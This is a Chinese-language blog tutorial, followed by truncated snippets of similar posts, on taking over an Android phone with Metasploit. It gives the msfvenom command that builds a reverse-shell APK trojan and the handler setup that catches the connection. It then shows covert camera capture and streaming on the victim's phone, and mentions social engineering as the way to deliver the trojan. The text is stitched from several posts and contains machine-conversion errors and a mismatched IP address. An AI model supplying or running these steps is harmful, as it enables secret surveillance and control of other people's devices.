MSF入侵安卓手機

2022-07-16 06:39:15 字數 2157 閱讀 9048

msf是metasploit的簡稱,metasploit是一款開源的安全漏洞檢測工具,非常強大,分別有windows版和linux版,工具裡整合了許多微軟公布的漏洞(0day)。

我這裡做測試的系統是backbox linux ,這是一款網路滲透,資訊保安評估系統。裡邊安裝了許許多多的工具。其中msf就自帶有。當然還有其它的 比如kali linux 、back track這些等等。

環境:backbox linux+msf

目標:一台安卓手機

既然是入侵安卓手機,肯定要先配置乙個安卓木馬,那我們看看本機的ip 

本機ip:192.168.1.6

在到終端輸入命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.7 lport=5555 r > /root/apk.apk

以前的msf老版本是用msfpayload生成木馬 現在在新版本中都用msfvenom代替了,所以有些朋友在終端輸入msfpayload的時候 會提示

msfpayload無法找到命令 所以使用msfvenom即可,這裡lhost 對應的是本機的ip位址 lport對應你要監聽的埠 然後生成木馬的路徑

這樣我們就在/root/路徑下生成了乙個apk的安卓木馬檔案,至於木馬的免殺暫且不談。現在我們在來啟動msf工具

輸入命令:msfconsole

然後輸入:

1. use exploit/multi/handler 載入模組

2. set payload android/meterpreter/reverse_tcp  選擇payload

3.show options 檢視引數設定

我們看見payload裡邊有兩個引數要設定 lhost和lport 表示位址和埠 預設的埠是4444 現在我們來更改設定

1.set lhost 192.168.1.6 這裡的位址設定成我們剛才生成木馬的ip位址

2.set lport 5555 這裡的埠設定成剛才我們生成木馬所監聽的埠

3.exploit 開始執行漏洞 開始監聽...

還有社工什麼等等的,這裡我就簡單的把木馬檔案弄我自己的手機上做測試

安裝完成後 會在桌面上生成乙個mainactivity的程式圖示 這個就是我們剛才生成的木馬 當我們點選了這個圖示 手機會沒有任何反應 其實木馬已經開始執行起來了

我們可以在我們的msf裡看見有乙個會話連線了

這樣對方的手機就就被我們控制了,檢視手機系統資訊,輸入命令 sysinfo

webcam_list檢視手機攝影頭有幾個 這裡顯示兩項 分別表示有前後兩個攝像頭

webcam_snap 隱秘拍照功能

後邊跟上引數-i 指定使用那個攝像頭拍照

可以看見我們分別對前後攝像頭都拍了照 儲存到了桌面上

還可以輸入命令 webcam_stream 開啟攝像頭 

其它的功能還有更多 。暫時就先到這吧。。。

msf滲透安卓手機

首先你需要kali系統 首先ifconfig檢視本機在區域網內的ip 使用msfvenom生成apk木馬 msfvenom p android meterpreter reverse tcp lhost 你在區域網內的ip 我的是192.168.0.13 lport 監聽的埠 我用的是8888 r ...

MSF滲透安卓手機實戰 詳細

利用msf生成apk木馬 在kali中會生成的木馬檔案 設定payload引數 開啟監聽 use exploit multi handler 設定tcp監聽 set payload android meterpreter reverse tcp 設定攻擊主機ip set lhost 攻擊主機ip位址...

kali攻擊手機 kali linux入侵安卓手機

這裡是做次筆記。kali入侵安卓手機的方法和其他的博主方法一樣,只是開頭對手機的ip進行設定 首先,我用的靶機是魅藍2,對其網路使用靜態ip aaa,x 是需要對應入侵機的ip,a 則是沒用過的0 255隨便輸 msfvenom p android meterpreter reverse tcp l...